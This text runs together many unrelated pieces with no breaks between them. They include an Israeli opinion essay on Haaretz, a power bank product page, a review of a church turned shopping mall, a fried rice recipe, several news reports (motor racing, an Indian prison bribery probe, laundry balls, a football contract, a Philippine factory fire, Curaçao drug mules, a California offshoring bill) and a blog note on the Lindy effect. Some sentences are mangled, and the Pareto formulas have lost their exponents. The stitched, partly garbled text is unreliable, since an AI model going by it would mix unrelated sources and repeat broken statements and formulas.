Four factors have converged to make Haaretz more annoying to Israelis today than ever before . First , the country is less receptive to a left-wing agenda as most of its citizens tilt rightward . Second , the country feels it is under an unjustified and hypocritical international siege and so is less forgiving when Israelis are perceived to be providing Israel 's critics with ammunition . Just recently , Jewish Israelis ranked “ left wingers ” as one of the groups contributing least to Israel 's success . Third , Israel 's left is very small , and also feeling under siege . Fourth , the left 's frustration with Israel makes it bitter and antagonistic . It makes it more prone to test the patience of other Israelis by upping the rhetorical ante in its criticism of country , leaders and groups .
The result of this increasingly provocative discourse is often pathetic , at times comical and occasionally worrying . Haaretz irks the majority of Israelis by giving voice to preposterous descriptions of what Israel is or does ( “ fascism , ” “ apartheid ” ) , and the majority and its leaders never fail to take the bait and fly into a rage . It is a childish game and , in the long run , Israel loses . Its quality newspaper of coherent dissent , necessary in a pluralistic society , has become a platform for juvenile contrarianism . Its left-wing opposition , to which Haaretz gives voice , has become synonymous with needless antagonism ; public debate has been made blunter and less constructive ; the public is angrier and less tolerant of dissent .
Tempting as it is , the story of the people vs. Haaretz is not a story of a country whose public is no longer willing to tolerate debate . It is a story about a group within Israel that is losing its ability to communicate with the rest of society and have any chance of influencing its future . It is a story about a group within Israel that finds its relief in provoking the rest of us until we snap .
Type-C charging ｜ High density batteries ｜ Two-way fast charging ｜ 12.58mm thin
USB Type-C charging The micro USB cable comes with a Type-C adapter for a wide range of charging options that support phones ,
tablets , notebooks , and more . Simply pair with your own cable to charge iOS devices .
12.58mm thin Sleek and slim , it is 42 % thinner than the regular
10000mAh Mi Power Bank and only 2.68mm thicker than
the 5000mAh Mi Power Bank despite having
twice the capacity .
18W fast charging both ways Whether it 's charging others or getting charged ,
10000mAh Mi Power Bank Pro moves fast .
With up to 18W fast charging , it intelligently adjusts power
output to safely charge each connected device . Time to fully charge a 3090mAh Android
device ( QC2.0 ) with 5V/2A power banks 2h 30min
Time to fully charge a 3090mAh Android
device ( QC2.0 ) with 10000mAh Mi Power Bank Pro 1h 50min
Time saved 25 % * Lab test results . Actual usage may vary .
Time to fully charge
a 5V/2A power bank 6 hours
Time to fully charge
10000mAh Mi Power Bank Pro 3.5 hours
Time saved 40 % * Lab test results . Actual usage may vary .
Double press for low power charging Safely charge low power devices such as bluetooth headsets or fitness bands .
Simply double press the power button to enter 2-hour low power charging . * Figures by Zhimi Technology based on internal data . Figures may vary based on environmental conditions .
High-density lithium polymer batteries Incredibly dense , 10000mAh batteries supplied by ATL/Lishen are used to satisfy the portable power needs for your phone , tablet , camera , and more . Full charges a 3000mAh
Android phone ( QC 2.0 ) 2.5x
Fully charges iPhone 6 4x
Fully charges iPad mini 1.5x * Lab test results . Actual usage may vary .
Nine layers of world-class circuit chip protection With adopted USB smart-control chips and charging/discharging chips built by Texas Instruments ,
Mi Power Bank not only provides nine layers of circuit chip protection . It also enhances charging efficiency . Temperature Resistance Heat-sensitive and temperature control mechanism ensures Li-ion batteries operate within a safe range .
Protection from Short Circuit Automatic protection to the motherboard and battery when short circuit occurs .
Reset Mechanism Power button can be used to reset the power bank in unstable environment .
Input Overvoltage Protection OVP circuit prevents voltage surges from damaging the device .
Protection from Incorrect Insertion Detect when the charger is inserted incorrectly and automatically stop charging .
Protection from Output Overcurrent Monitors output current and shuts off when current exceeds the maximum limit to protect the device .
Output Overvoltage Protection Monitors output voltage and shuts off when voltage exceeds the maximum limit to protect the device .
Protection from Overcharge and Over-discharge Japanese technology is adopted to prevent overcharging and over-discharging from damaging the Li-ion batteries .
PTC Protective Circuits for the Cell Imported battery cells are equipped with PTC to effectively control current and provide protection when temperature and current exceed the maximum limit .
Up to 93 % conversion rate Optimized charging/discharging efficiency World-class chips are not only safer , they improve charging conversion rates and stabilize discharging voltage .
With advanced resistance-capacitance sensors , 10000mAh Mi Power Bank is more durable and optimizes charging efficiency . Up to 93 % conversion rate
Minimum 7000mAh actual output capacity * Lab test results . Actual usage may vary .
Feels exceptional in hand CNC edges + Double anodized aluminum The double anodized aluminum case has a matte ,
polished and extremely smooth surface for better hand feel .
Comes with shiny CNC-finished edges - a design
typically reserved for premium smartphones . Aluminum metal case High-precision CNC cutting tools are used to create the integrated aluminum case ,
which has a high structural strength that can withstand collisions and
up to 2000 pressure impacts . Elegant , rounded curves Ergonomically friendly and easy to hold .
Anodized aluminum case The meticulous anodizing process creates a stronger surface resistant to color fading , swear , daily wear , and corrosion .
Naturally indented button A slightly indented button resets the power bank with a simple touch . Manufacturing process Cutting
Sandblasting
Anodization
Oxidation
CNC+
Polishing
Anodization
Oxidation
Quality
checks
Laser
engraving
Finding the Light ; Limelight 's Church to Capitalism
A building 's structure creates certain expectations . A 50-story glass curtain wall building conjures up ideas of the office work that must go on inside . Conversely , a small country home invokes ideas of domestic life . A church , particularly one in the recognizable Neo-Gothic style , has a structure so iconic that nobody , religious or not , can mistake it for anything but a place of worship . When I first came across the Limelight Marketplace at 656 6th Avenue at the corner of 20th Street , and saw inside not an altar and pews but an array of shops , I was quite taken aback .
Originally called Church of the Holy Communion , the architect of the church was Richard Upjohn , who famously designed the Trinity Church in downtown Manhattan . In the 1970s , the church was deconsecrated and re-purposed first as a drug rehabilitation centre and later as a nightclub , which ironically became notorious for drug use . In May 2010 , the building was re-purposed yet again as the Limelight Marketplace . Developer Jack Menashe hired a design team lead by James Mansour to transform the building into a three-story indoor shopping space based on European modes of shopping . It is now called “ A Festival of Shops ” and features over 60 specialist boutiques selling apparel , accessories and gourmet food .
If John Ruskin , who attached strong moral ideas to Gothic architecture , had seen this church 's reincarnation , there is no doubt that he would have been disgusted . I originally attempted to critique the Limelight Marketplace 's re-design by how tastefully and respectfully have they considered the architecture while the transformation was conducted , without too any religious or moral associations . But , even though I am not a religious person , I found those aspects are impossible to separate . Its former purpose as a church completely informs how the interior is read . The interior 's overly glossy atmosphere not only seems overbearing , which is n't in keeping with their goal to feel like a European market , but becomes particularly uncomfortable when your consider it as a former place of worship .
The Brownstone exterior still has all its recognizable Gothic features intact : stained glass windows , lancet windows frames . The only exterior adornments are the black and white cloth signs that hang from the building and an 8 inch plaque right of the door . Jack Menashe had sought 13 signs for the exterior but the city 's Landmarks Preservation Committee allowed only 8 . This restriction might explain the two enormous free standing signs , each featuring one half of the site 's logo , placed on the sidewalk on both sides of the door . The circular logo 's pattern has a flower-like pattern has taken been taken from the window above , so before I even entered I expect that the marketplace is using the building as a unique sell-point , instead of trying to ignore it .
Customers enter through the original pointed red wooden door , where a layer of pearl white has been painted on the inside . This white paint is the first indication of the gloss that has been applied throughout the building . Through this door is an alcove with the first of many decadent chandeliers inside the building . The store 's floor plan hangs on the wall to the right . This means there is a large extension on the left-side of the church , which now houses the food emporium . The rows of stores are laid aside both sides of the church and a collection of shoe and candy stores at the back . The two upper levels , which include jewellery stores and spa area , protrude over all these stores like large balconies . These levels are accessible by narrows stairs at the rear of the church . The food emporium is not visible from the main entrance but begins behind the candy store and continues through to an extension on the left side of the building . Gothic churches are typically laid out in a cross shape but the church 's first reverend , Rev . Muhlenberg asked Richard Upjohn to include design elements that were more in keeping with Roman Catholic churches so this extension was added .
A shiny black and white marble floor begins in the alcove and continues throughout the ground floor in a checkered pattern . A long red carpet has recently been added for the holiday season , either to give it a more “ Christmasy ” feel or to make customers like celebrities . The first thing that strikes you upon entering is how bright the interior is , quite a feat considering churches are notoriously dark spaces . The large lights hanging from the ceiling and banisters decorated in fairy lights reflect off the Gothic features that have all been painted a bright white using the same white pearl paint on the front door . The ceilings have been kept dark to contrast with the glossy white Neo-Gothic flourishes but also include some sections of hot pink making the interior look like a Barbie 's Dream Church . There is a collection disco balls hanging at different levels from the centre of the ceiling , perhaps recalling its former status as a disco . There is an abundance of chandeliers throughout the space , which begin to feel quite excessive as you move through the interiors .
As you walk through the nave , down what would normally be the church 's aisle , there are a number of high-end boutiques selling perfumes , soaps and books to your left and right where there would normally be pews . Each store is encased in its own arched frame , either in white or light pastel . The building 's overly glossy finish is in conflict with its goal to appear like a traditional European market . The interior basically has a suburban mall aesthetic , albeit on a smaller scale , within a church casing . The interiors generally improve as you move away from the centre . The ‘ Le Pain ' cheese shop at the back of the store , past the now-candy covered transept has darker interiors , red brick walls and exposed wooden beams , and feels like the most genuine representation of a European market within the store . The Gourmet Room has a cream tile floor and less sparkling chandeliers and thus feels much less over-bearing . The ugliest part of the interior is the stairs at the back of this food court that lead to Tina 's Attic where the revolting lime green exposed brick wall and an enormous orange sign surrounded by Las Vegas style lights .
A bright array of candy in every color , shape and size , attracts you under a pink jellybean encrusted arch and inside It'Sugar store at the apse of the church . It is difficult to tell if this was an intentional decision to place a candy store at the back of the church where the congregation would normally receive the host or ‘ body of Christ ' during a church service , but I find it surprising that nobody thought to point that out . The art deco-style frame surrounding the store is topped with a large ‘ S ' with a wings and devil horns pattern extending out of it which is not only a cliqued logo design , but inappropriate considering its setting .
As I have begun to ascend the first set of narrow stairs to the upper levels , I was distracted by some artwork hanging in the Orbit Gallery Space in my eye line . The “ Heavenly bodies ” collection featured four pin-up girls with Bettie Page hairstyles , huge breasts in animal print bra and knowing , seductive stares surrounded in a flames motif . Hang on , the flames of hell and half naked women in a former church ? Heavenly bodies ? Surely , this is not a coincidence . I do n't condone artistic censorship in a gallery setting , but there is something in this juxtaposition that I feel goes beyond the realms of taste . And the piece itself is cheap and tacky enough that I can not defend it on artistic merit .
Design is not just about decoration , it is also a curatorial process . Because the Limelight Marketplace 's planners had very little control over the building 's exterior and layout , the decisions made about the interior become increasingly important . The white painted arches clash with the historical stained glass windows . The Hunter shoe store wall has kept the original stone carving detail and uses it as decorative element to emphasize the shoe rack . For most of the stores , their position in the church is like a decorative gimmick they enjoy referencing through their logos , products and layout , which if it is n't inappropriate , it is at least tacky .
You can landmark a building 's structure but you can never “ landmark ” its function . Is it acceptable to have a market in a Catholic Church because churches have traditionally held markets on church grounds ? Would a shopping mall be appropriate in a Synagogue ? Would a sex shop be appropriate ? Since now repurposed churches are becoming increasingly common , it is worth reflecting if there is ever a line that can be crossed in regards to appropriateness . This is an ethical or a taste issue more than an architectural issue so I ca n't give a definitive answer for every person . But for me , Limelight 's glossy white painted Gothic arches , tacky stores and inappropriate choices are irksome and often cross that line .
Advertisements
August 24 , 2013 MMM Foodies
( Note : originally published Aug 24 , 2013 )
It 's not always easy trying to come up with something that my vegetarians and meat-eaters will both love . This recipe is easy , versatile and more than satisfies them all ! If the kids do n't like these veggies , substitute one 's they will . Or give them the meat and rice and open a can of corn or something ! If the vegetarian wants some tofu or tempeh added , no problem ! I call it “ This Week 's Fried Rice ” because it is so versatile . Throw in whatever is seasonal or leftovers from the fridge ! Due to allergies , I do not use shellfish , shrimp or sesame oil . If these are not a problem for you , a teaspoon of toasted sesame oil in the vegetables would be appropriate and shrimp makes a great fried rice ! If your vegetarians allow the fish option , i.e. , “ pescetarians ” , then everyone could have that version !
I used a couple of ingredients that you may not have handy . One was the Black Bean Paste…you might have to go to an Asian market for that one . It would n't really hurt too badly to leave it out , if you need to , but you might want to add a little extra soy sauce . If you can find it though , it lasts well in the fridge . The other is my homemade pickled jalapenos brine that is mainly rice vinegar . You could use plain rice vinegar , if you like it milder . To spice it up , you could buy a commercial pickled peppers condiment…you know , those that Peter Piper picked . Enjoy !
2 c. White Rice , dry . ( Nishiki brand prepared in rice cooker is what I use . )
1 c. Yellow Squash , quartered and sliced
2 c. Cabbage , sliced , about ¼ of a small head
1 c. Carrots , peeled and diced
Optional : other vegetables you have on hand , such as onion , scallion , zucchini , broccoli , peppers , etc .
1 can Dice Water Chestnuts , drained
Sauce ingredients
2-3 cloves Garlic , peeled and minced or run through press
1 piece Ginger , ½ ” x1 ” , peeled and minced
1 Egg , whisked to combine
Oil for wok/fry pan
Sauce
2 Tablespoons Soy Sauce
1 teaspoon Black Bean Paste
1 teaspoon Pickled Jalapeno Vinegar ( or just Rice Vinegar )
1 teaspoon Honey
2 Tablespoons Water
Directions
Prepare rice according to package instructions . Preheat a wok or large frying pan over high heat . Add a tablespoon or so of oil .
veggies in Wok
Add carrots and sauté for about 2 minutes , moving almost constantly . Follow with cabbage and other vegetables , sautéing each before the addition of the next . ( Note : vegetables should be added in the order of what takes longest to cook to shortest . Water chestnuts or other canned additions like mushrooms or bamboo shoots really just need to be heated through . ) Finish with garlic and ginger . Remove from heat to serving bowl and set aside .
If going non-vegetarian
T-Bone
Preheat grill or broiler . Cook beef or meat of your choice to your preference . ( I used a T-bone steak and was shooting for medium-rare…got it pretty close . )
Allow meat to rest for 5 to 10 minutes . Slice into thin strips and set aside .
Make sauce by combining the soy sauce , jalapeno vinegar , water , honey and bean paste in a small bowl . Re-heat wok or frying pan and add another tablespoon of oil . Add rice and quickly heat through , moving constantly . Make a well in the middle of the rice and add the egg . Scramble and mix with rice . Add sauce and mix until well combined and hot . Remove from heat .
Ready to assemble .
To serve
Put a scoop of fried rice in a serving bowl . Top the rice with the vegetable mixture . If you are going vegetarian , that 's it ! Serve with soy and pepper vinegar on the side . If you are adding meat , lay several strips across the top of the rice and vegetables . This makes an easy meal to serve a mixed-company vegetarian/meat-lover crowd ! Enjoy !
Advertisements
Supercars officials remain confident of securing a new marquee event in New South Wales despite confirmation that Gosford will not join the series in 2017 .
Gosford had long been targeted to replace the Sydney Olympic Park season finale , which will not continue beyond this year .
Supercars and its engineering partner iEDM had undertaken significant work on the bid , including the design of potential circuit layouts .
The recently amalgamated Central Coast Council has however announced that a race will not go ahead , citing both costs and disruption to local traffic as determining factors .
“ On paper this looks like a fabulous opportunity for the Coast , ” said Council 's Chief Executive Officer , Rob Noble .
“ Then you drill down and realise we would have to close one of the main arterial roads on the Coast for more than four days .
“ I know residents would rather we spent the money on roads they actually drive on every day .
“ In the end it just did n't stack up for us . ”
Despite the news , a Supercars spokesman told Speedcafe.com that the championship remains in talks to bring a new event to NSW next year .
Newcastle has been touted as another possible alternative for a new NSW event to complement existing races at Sydney Motorsport Park and Bathurst .
Any new event , which would be held as the championship 's season finale , will require buy-in from both Destination New South Wales and the relevant local council .
“ It 's disappointing for the Central Coast , but we have been working on a range of options for an exciting new event in New South Wales for 2017 , ” said the spokesman .
The Sydney Olympic Park event has been run since 2009 , but will be dropped due to the high costs of operating the precinct .
special facilities for AIADMK general secretary VK Sasikala +
serving a sentence at the Parappana Agrahara +
We have taken serious cognizance of the allegation of irregularities in Bengaluru Central Prison & ordered a high level inquiry . 1/2 — CM of Karnataka ( @ CMofKarnataka ) 1499929682000
Request all to await the outcome of this inquiry . Strict action will be taken against any person found guilty of wrongdoing . 2/2 — CM of Karnataka ( @ CMofKarnataka ) 1499929697000
allowed to meet several visitors +
NEW DELHI : Karnataka chief minister Siddaramaiah on Thursday ordered a high-level probe into allegations that the prisons ' department officials have received Rs 2 crore bribe to provide , who is currentlycentral jail in Bengaluru.The CM , however , has not specified as to who will head the probe and the deadline for the completion of the probe . The high-level probe will be based on the report submitted by Deputy Inspector General of Police ( Prisons ) D Roopa , who stated that there are speculations of Rs 2 crore bribe having paid to Karnataka 's jail authorities including Director General of Police ( Prisons ) HNS Rao , her senior officer . She had stated that a special kitchen has been given to Sasikala , a high-profile convict from neighbouring Tamil Nadu . `` We have taken serious cognizance of the allegation of irregularities in Bengaluru Central Prison & ordered a high level inquiry ( sic ) , '' chief minister Siddaramaiah tweeted out on Thursday . `` Request all to await the outcome of this inquiry . Strict action will be taken against any person found guilty of wrongdoing , '' he further tweeted.DIG ( Prisons ) D Roopa on Wednesday alleged that senior jail staffers are allowing a host of illegal activities at Central Prison , Parappana Agrahara , including provision of special treatment to former AIADMK general secretary VK Sasikala.In a letter to director general and inspector general ( DG & IG ) of police RK Dutta and DG ( prisons ) Sathyanarayana Rao , Roopa has said Sasikala is being allowed to use a separate cooking room , while Abdul Karim Telgi , convicted in the stamp paper scam , is provided undertrials as aides . `` These violations of prison rules have come to your notice , and there are talks of Rs 2 crore having been given as bribe for the same . I request you to act immediately and punish people breaking the rules , '' Roopa 's letter read.The prison has been in the eye of a controversy involving Sasikala , who is serving term after being convicted in a disproportionate assets case , and is beingin violation of norms.DG ( Prisons ) Sathyanarayana Rao , however , denied these claims and said , `` There is no VIP treatment being given to any prisoner . If the DIG finds anything , she must first bring it to my notice and not go to media . I am yet to receive any such letter . ''
Laundry balls are no better at getting clothes clean than washing in plain water , Consumer NZ says .
The balls sell for more than $ 100 each and manufacturers claim they can be used for hundreds of washes .
But the watchdog said its testing showed consumers were wasting their money .
Four laundry balls and soap nuts were tested by Consumer NZ .
A spectrophotometer was used to analyse how well each product removed some typical stains , including everyday grime , grass and mud , chocolate ice cream , make-up and baby food .
The tests showed two of the laundry balls , Miracle II and Share Wellness , consistently delivered the same or a poorer washing outcome than washing with plain water .
Another two , Ecozone and Live Simply , performed only slightly better .
Soap nuts were less effective than water for everything except tomato and baby food .
Consumer NZ head of testing Paul Smith said people who preferred to avoid regular detergents would be better off not using anything . `` You achieve similar results to laundry balls or soap nuts but it wo n't cost you a cent , '' he said .
He said some claims for laundry balls were wacky .
One website claims the Miracle II Laundry Ball is `` eloptically energised '' and `` emits a strong negative-ion field and breaks up water molecules so they can reach further into fabric and clean better '' .
Smith said : `` If those claims do n't ring alarm bells , its price should . At $ 119 for a single ball , you 'd expect it to work miracles but our test found it did n't have any special dirt-removal powers . ''
Consumer NZ chief executive Sue Chetwin said the tests were done according to the manufacturer recommendations , with a cold wash in a front-loader machine .
She said the manufacturers seemed to be trying to blind people with false science .
`` People think they are doing something good for the environment and also getting their clothes clean but they would be better using water . They all performed badly . ''
Pontus Jansson has become the latest Leeds United player to extend their stay at Elland Road , by putting pen to paper on a new five year deal .
Swedish international Jansson joined the Whites from Italian outfit Torino on loan at the beginning of the 2016/17 season , before the deal became permanent over the summer .
The 26-year-old has made a total of 47 appearances for Leeds , scoring three goals and has become a key figure at the heart of the Leeds defence .
The centre back Jansson joins a long list of Thomas Christiansen 's squad to commit their future to Leeds with the likes of Eunan O'Kane , Stuart Dallas , Kalvin Phillips , Gaetano Berardi , Ronaldo Vieira , Conor Shaughnessy , Liam Cooper and Luke Ayling all signing new long term contracts this summer .
Jannson 's new deal will expire at the end of the 2021/22 season .
( UPDATED ) As of midnight of Thursday , there are between 80 and 100 HTI workers being treated in various hospitals around Rosario town , where the Cavite Export Processing Zone is located
Published 12:49 AM , February 02 , 2017
CAVITE , Philippines ( 3rd UPDATE ) – About 100 were injured in an evening fire that hit a factory in an export processing zone in Cavite , south of Metro Manila , on Wednesday , February 1 .
As of posting , an undetermined number of workers are reportedly still trapped inside the House Technology Industries building , but authorities wo n't confirm the information .
Cavite Governor Jesus Crispin Remulla told Rappler over the phone that the fire broke on Wednesday at around 6 pm , just as the workers had changed shifts .
Local authorities said the fire was under control at around 11:30 pm .
Remulla said that , as of midnight of Thursday , there are between 80 and 100 HTI workers being treated in various hospitals in the cities and towns around Rosario , where the Cavite Export Processing Zone is located . ( LIST : Workers injured in Cavite export processing zone fire )
The HTI facility , where housing materials for export to Japan are manufactured , occupies 6 hectares in the Cavite EPZA . The biggest group of companies in the processing zone , it has a total of about 15,000 workers and has been considered by local governments as the best employer here . The hospitals where the injured workers were brought to have tie-ups with HTI .
Twenty of the 53 people who were brought to the the Divine Grace Medical Center in the neighboring city of General Trias are in critical condition , according to Michael del Rosario , whose family owns the hospital .
The governor said in a press con Thursday afternoon that only 4 had been reported to the authorities to be in critical condition .
As of Thursday , two employees were confirmed missing , but Remulla said the final number will be determined only when firefighters and rescuers are able to enter the area . The fire still raged almost 24 hours after it started . – with reports Aika Rey and Mover Catherine Co/Rappler.com
A Birmingham tech startup is aiming to end the long wait in line for tag renewals .
Breeze - a five-employee operation housed in the Innovation Depot - builds apps for counties to allow residents to do basic tasks like renewing car tags or paying property taxes online .
Will Yarbrough , Adam Aldrich and Trent Kocurek co-founded Breeze , which got its first customer around the end of 2012 . Breeze already is working in five Alabama counties , and just got its first county in Mississippi .
The idea for the app came while one of the founders was observing others in line to get his car tags renewed .
`` What are people doing while they 're standing in line ? They 're looking at their smartphones . So we thought , there 's an app for everything , why is n't there an app for that ? '' Yarbrough said .
Breeze is already operating in Blount , Cullman , Calhoun , Coosa , Marengo and Autauga counties in Alabama . It just got a contract with Alcorn County , Mississippi .
Breeze moved into the Innovation Depot in May . With its newest customers , it 's tripled in size in the last size months .
`` Expanding into a new state allows us to understand and learn about a new market in Mississippi , '' Yarbrough said . `` Our customer is the county , and there 's only so many of those and they 're not making new ones . We have a limited number of targets in the marketplace : there 's only 67 counties in Alabama . ''
So Breeze needs to expand into different states to grow .
Breeze is in the process of developing software for states as well . It also makes `` kiosk renewal stations '' - where users can pay their taxes via an iPad in a public building rather than waiting in line to speak to a county worker .
Though counties are the ones who pay for the apps , users pay a $ 1 service fee .
`` It acts like a satellite courthouse , where you can go and pay your taxes even if you do n't have a smartphone . You can renew your tags there and not have to drive 45 minutes to the county seat , '' Yarbrough said .
Congress party has no other alternative to Rahul Gandhi and that he is the `` best one '' to lead the party , senior Congress leader Ramnarayan Meena today said .
`` Congress party has got no other leader but Rahul Gandhi who can unite the party and bring it to the mainstream . There is no other alternative to Rahul Gandhi in Congress party . He is the next one and best one in the party , '' Meena said .
The veteran leader , who had been Congress party observer in Punjab , Chattisgarh , Haryana and other states in the past , expressed confidence that the party can retain its previous image only under the leadership of Rahul Gandhi .
`` There is no other leader except Rahul to lead the Congress party . He is an accepted leader in the party , '' he said .
Talking about Priyanka Gandhi , Meena said she can never join Congress party actively as she now belongs to Vadra family . Meena also appreciated former PM Atal Bihari Vajpayee saying he is the `` real nationalist leader '' who paved the way for the Prime Ministerial post for Narendra Modi .
`` No other leader in BJP but A B Vajpayee could have paved the way to Prime Ministerial post for Modi , '' he said .
This post is a set of footnotes to my previous post on the Lindy effect . This effect says that creative artifacts have lifetimes that follow a power law distribution , and hence the things that have been around the longest have the longest expected future .
Works of art
The previous post looked at technologies , but the Lindy effect would apply , for example , to books , music , or movies . This suggests the future will be something like a mirror of the present . People have listened to Beethoven for two centuries , the Beatles for about four decades , and Beyoncé for about a decade . So we might expect Beyoncé to fade into obscurity a decade from now , the Beatles four decades from now , and Beethoven a couple centuries from now .
Disclaimer
Lindy effect estimates are crude , only considering current survival time and no other information . And they 're probability statements . They should n't be taken too seriously , but they 're still interesting .
Programming languages
Yesterday was the 25th birthday of the Perl programming language . The Go language was announced three years ago . The Lindy effect suggests there 's a good chance Perl will be around in 2037 and that Go will not . This goes against your intuition if you compare languages to mechanical or living things . If you look at a 25 year-old car and a 3 year-old car , you expect the latter to be around longer . The same is true for a 25 year-old accountant and a 3 year-old toddler .
Life expectancy
Someone commented on the original post that for a British female , life expectancy is 81 years at birth , 82 years at age 20 , and 85 years at age 65 . Your life expectancy goes up as you age . But your expected additional years of life does not . By contrast , imagine a pop song that has a life expectancy of 1 year when it comes out . If it 's still popular a year later , we could expect it to be popular for another couple years . And if people are still listening to it 30 years after it came out , we might expect it to have another 30 years of popularity .
Mathematical details
In my original post I looked at a simplified version of the Pareto density :
f ( t ) = c/tc+1
starting at t = 1 . The more general Pareto density is
f ( t ) = cac/tc+1
and starts at t = a . This says that if a random variable X has a Pareto distribution with exponent c and starting time a , then the conditional distribution on X given that X is at least b is another Pareto distribution , now with the same exponent but starting time b . The expected value of X a priori is ac/ ( c-1 ) , but conditional on having survived to time b , the expected value is now bc/ ( c-1 ) . That is , the expected value has gone up in proportion to the ratio of starting times , b/a .
The Airbus aircraft , in red and white livery , is parked at Gate 1 of the Curaçao airport . It 's a Tuesday in June and passengers are waiting to board the jet . One young man dressed entirely in black stands out among the brightly clad vacationers on the Caribbean island .
Suddenly , customs officials rush into the departures hall and begin scanning the passengers with their eyes before their gazes settle on the man . When they lead him away , he does n't resist .
The man had already caught their attention when he went through passport control , whereupon they examined the bag he had checked . They determined that the clothing in his suitcase had been soaked in liquid cocaine . More than six kilograms of the drug had been hidden using the not-uncommon method .
Arrests like this are a part of everyday life on the Caribbean island of Curaçao , which advertises itself as a vacation destination with its green palm trees , its white beaches and its crystal-clear water . Every Tuesday , an aircraft from Air Berlin , Germany 's second-largest airline , flies from Düsseldorf to Curaçao before reversing course and arriving back in Germany on Wednesday afternoon . Most passengers are tourists , but drug couriers are also frequently on board .
Alarm Mode
Each week , when Flight AB7409 arrives in Düsseldorf , airport customs officials go on high alert -- and almost as often , they find cocaine aboard the aircraft . Last year , customs officials seized 132 kilograms ( 291 pounds ) of it , arresting some 63 drug mules who had been carrying cocaine on their bodies . While already a phenomenon in other European countries with regular flights to the Caribbean , like the Netherlands , it 's a new development for Germany . The route is an attractive one , too . Round-trip tickets start at 500 ( $ 551 ) and , because the former colony is a Dutch territory , its residents do not require visas to visit the European Union .
Kenrick Hellement is the head of customs at Hato airport in Curaçao and is responsible for ensuring that cocaine does n't end up on flights . With up to 1,000 passengers departing for Europe each day , though , it 's a nearly impossible job . `` I 'm surely not the most-liked person here , '' Hellement says . He says he 's even had to arrest fellow players from the softball team he plays on . With just 150,000 residents , it 's the kind of place where you kind of know almost everyone .
Tons of cocaine are regularly transported to Curaçao , much of it coming from Venezuela , located only 60 kilometers ( 37 miles ) away . It takes less than an hour to make the journey by speed boat , and Curaçao 's coast , with its many lagoons , bays and beaches , makes it relatively easy to get the product onto land . A kilogram in Colombia , where cocaine is produced , costs $ 1,500 . Once it reaches Curaçao , it is worth $ 5,000 . By the time it is sold in Europe , it costs $ 50,000 per kilogram .
Curaçao 's drug mules are also creative . The customs official tells of one man who reached for a specific bottle of spirits in the back row on a shelf in the duty-free shop . When they examined it , they found the bottle was full of liquid cocaine .
Gutsy Smugglers
Many mules transport the drugs in their bodies , ingesting up to a kilogram of cocaine . The powder is packed into the fingers of the kind of latex gloves used by doctors -- up to 10 grams each -- and then swallowed . Locals call the small balloons : bolitas . Mules use boiled eggs to practice swallowing and they take medication to inhibit bowel activity during the flight .
Those caught in Germany are jailed in Düsseldorf , with 46 men from Curaçao are currently being held in the city , placing an additional burden on the city 's justice system . `` At times , we 've had up to 80 detainees from Curaçao here , '' says Elke Krüger , head of the Düsseldorf prison . Now , though , the prisoners are sent to other jails as well .
The smugglers are also creating significant difficulties for Brond-Hendrick Böttcher , head of customs at the Düsseldorf Airport , which is Germany 's third largest . As an economic enterprise with a high number of passengers who need to be processed quickly , the Düsseldorf Airport is a `` hostile environment '' for the kind of intensive controls necessary to combat the problem , says Böttcher . Adequate screening takes up a lot of time .
Böttcher is happy when the flight from Curaçao arrives at Gate C06 -- the one located furthest from baggage claim . It gives his staff a bit more time to give travelers the once over . Furthermore , once the last passenger has disembarked , customs officials order that the doors be closed and nobody allowed on board until they have had a chance to search the plane for drugs . Even the contents of the waste-holding tank are destroyed .
Sweat Tests
Böttcher watches closely as the passengers make their way to baggage claim . Around two dozen are asked to open their suitcases . `` Where are you traveling to ? '' they are asked . `` What are your plans ? What 's in your suitcase ? '' They also swab peoples ' hands , allowing officials to detect traces of cocaine in their sweat .
Around half of those initially questioned are then asked to go to another section of the building , where they are subjected to deeper interrogation . In the end , one passenger admits to having swallowed cocaine . He is taken to a special toilet and a judge issues an arrest warrant . The public prosecutor accuses Romeo Roy J . -- a 39-year-old divorcé and father of two -- of having transported 55 bags , each containing 13.5 grams , in his bowels . That 's a total of 742 grams ( 26 ounces ) of cocaine , likely enough for a sentence of a couple years behind bars . He says he was in need of money and that he had been promised 2,000 to act as a mule . What nobody knows , though , is the number of smugglers who actually made it through undetected on this particular flight .
The problem is n't expected to go away , either , given that Air Berlin officials plan to add a second flight to Curaçao on Saturdays beginning in November .
California lawmakers are considering a bill that would make it difficult for state-regulated utilities to replace U.S. workers with H-1B workers . It may be one of the most significant anti-offshoring measures in years .
In the absence of federal action , states have long tried to put the brakes on the shift of jobs to offshore . Legislative efforts began in earnest with the burst of the dotcom bubble in 2001 . Many state bills were never adopted , but that has n't stopped some from trying .
In New Jersey , for instance , lawmakers in 2012 approved legislation intended to impede call center outsourcing . The Communication Workers of America , which spurred the effort , said that it had represented about 3,000 New Jersey call center workers in 2002 , but by 2012 , that figure had fallen to 725 .
The New Jersey CWA said telecommunications providers , notably Verizon , were shifting DSL call-center support jobs to India and other countries . New Jersey lawmakers responded by passing , in both houses , the `` Save New Jersey Call Centers Jobs Act . '' But Gov . Chris Christie , who announced Tuesday that he is seeking the Republican presidential nomination , vetoed the bill with little explanation .
The New Jersey bill required any employer relocating a call center to a foreign country to notify the state , and give up any grants , loans or tax benefits . A similar bill first introduced in Congress in late 2011 , the U.S . Call Center Worker and Consumer Protection Act , gained nearly 140 co-sponsors , mostly Democrats , but was not adopted . The bill was subsequently reintroduced in the following Congress , and once again failed to pass .
California 's anti-offshoring bill ( AB 853 ) , sponsored by Assembly member Roger Hernandez ( D-West Covina ) , is aimed at IT operations . It requires an electric or gas company `` to use direct employees for any work associated with the design , engineering , and operation of its nuclear , electrical , and gas infrastructure , including all computer and information systems , to the extent feasible . ''
Direct employees include contractor or subcontractors working under the direct supervision of the utility . If a utility wants to use non-direct employees ( workers who are n't under the direct supervision of the utility ) , it has to demonstrate to the state utilities regulator that the work `` can be performed safely and securely . ''
Legislative documents make clear the motivation for this bill : It is a direct response to Southern California Edison 's hiring of two India-based IT outsourcing companies and the subsequent layoff of 400 workers and the voluntary departure of another 100 . But the California legislative effort goes well past that issue .
The bill questions the use of offshore resources to manage part of the state 's critical infrastructure . Notably , the measure calls electric and gas utilities `` a paramount state interest , '' raising a security argument not unlike the U.S. Defense Department 's reason for not sending its development work offshore .
The state 's legislative analysis of the bill also notes that `` the part of any computer system that is most vulnerable to being compromised is the personnel who operate the system . ''
This bill , if it becomes law , will complicate the offshoring of IT work by utilities . It may become difficult to use H-1B workers who are supervised by contractors , and not directly by the utilities , on utility IT projects .
